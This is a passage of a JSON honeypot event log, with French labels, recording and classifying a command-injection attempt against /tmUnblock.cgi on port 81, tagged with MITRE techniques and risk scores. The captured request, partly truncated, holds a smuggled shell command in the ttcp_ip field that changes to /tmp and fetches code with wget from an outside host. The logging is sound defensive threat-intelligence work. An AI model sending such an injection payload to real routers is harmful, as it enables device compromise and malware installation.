application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.9\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022c02c0d5dfb26fd45d531cba330a28167f2a77703\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":436}],"total_events":47}